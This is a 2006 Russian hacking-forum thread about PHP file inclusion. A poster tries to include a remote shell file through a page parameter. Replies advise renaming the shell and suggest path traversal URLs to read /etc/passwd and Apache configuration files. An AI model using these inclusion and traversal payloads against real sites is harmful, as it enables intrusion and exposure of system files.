ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

инклуд
  #1  
Старый 13.03.2006, 06:36
Аватар для Foblas
Foblas
Новичок
Регистрация: 07.03.2006
Сообщений: 22
Провел на форуме:
94252

Репутация: -3
Отправить сообщение для Foblas с помощью ICQ
По умолчанию инклуд

вот чтоу меня получилось:
запрос допустим такой- http://www.target.com/index1.php?pag....com/shell.txt

в браузере вижу - Warning: Failed opening './http://mypage.org/shell.txt' for inclusion (include_path='.:/usr/share/pear:/home/httpd/phplib') in /home/target/public_html/index1.php on line 63

./ - возможно ли как-то обойти, чтобы заинклудить файл/скрипт/что_нибудь_ещё?

Не гнобите сильно, если это проскакивает тут в стотысячный раз )
 
Ответить с цитированием

  #2  
Старый 13.03.2006, 18:08
Аватар для ArdeOS
ArdeOS
Участник форума
Регистрация: 16.07.2004
Сообщений: 196
Провел на форуме:
2509801

Репутация: 211
По умолчанию

шелл нужно заливать на сайт с расширением php (!) А не с тхт - он выполнятся должен, а серевер на котором возможно есть инклуд, воспринимает его как обычный текстовик.
И еще на конце не нужно писать расширение пхп - http://mypage.com/shell если не катит то можно попробыва добавить его - в разных системах по разному
 
Ответить с цитированием

  #3  
Старый 14.03.2006, 18:25
Аватар для Trinux
Trinux
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818

Репутация: 569


По умолчанию

Нет, ./ не обойти. В твоем случае можно выполнять лишь локальный инклуд
 
Ответить с цитированием

  #4  
Старый 14.03.2006, 18:38
Аватар для limpompo
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd

Если пройдёт то
__http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf
 
Ответить с цитированием

  #5  
Старый 14.03.2006, 19:21
Аватар для Trinux
Trinux
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818

Репутация: 569


По умолчанию

Цитата:
Сообщение от limpompo  
попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd

Если пройдёт то
__http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf
опять же непонятно число уровней до корневой директории с корня веб-сервака. т.е. количество "../" менять постепенно вверх.
[offtop]
ну почему у меня ник темно-зеленый, а у лимпопо - светло-зеленый?
[/offtop]
 
Ответить с цитированием

  #6  
Старый 14.03.2006, 19:23
Аватар для tclover
tclover
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
Провел на форуме:
9751364

Репутация: 1847


По умолчанию

Цитата:
[offtop]
ну почему у меня ник темно-зеленый, а у лимпопо - светло-зеленый?
[/offtop]
Ночной дозор. Всем выйти из сумрака!
 
Ответить с цитированием

  #7  
Старый 14.03.2006, 19:23
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

Цитата:
попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd
никогда не понимал смысл вот этого
наверное статьи аля 80х, где цель всегда passwd, оставили свой след...
 
Ответить с цитированием

  #8  
Старый 14.03.2006, 23:52
Аватар для Foblas
Foblas
Новичок
Регистрация: 07.03.2006
Сообщений: 22
Провел на форуме:
94252

Репутация: -3
Отправить сообщение для Foblas с помощью ICQ
По умолчанию

Цитата:
Сообщение от limpompo  
попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd

Если пройдёт то
__http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf

Пробовал впервую очередь, всё равно добавляет это злобное ./ (
 
Ответить с цитированием

  #9  
Старый 14.03.2006, 23:56
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

[offtop]
Trinux он же и в МОА ив АМА
[/offtop]
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Php- инклуд. •••™NO FEAR™••• Уязвимости 6 27.01.2006 08:58



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ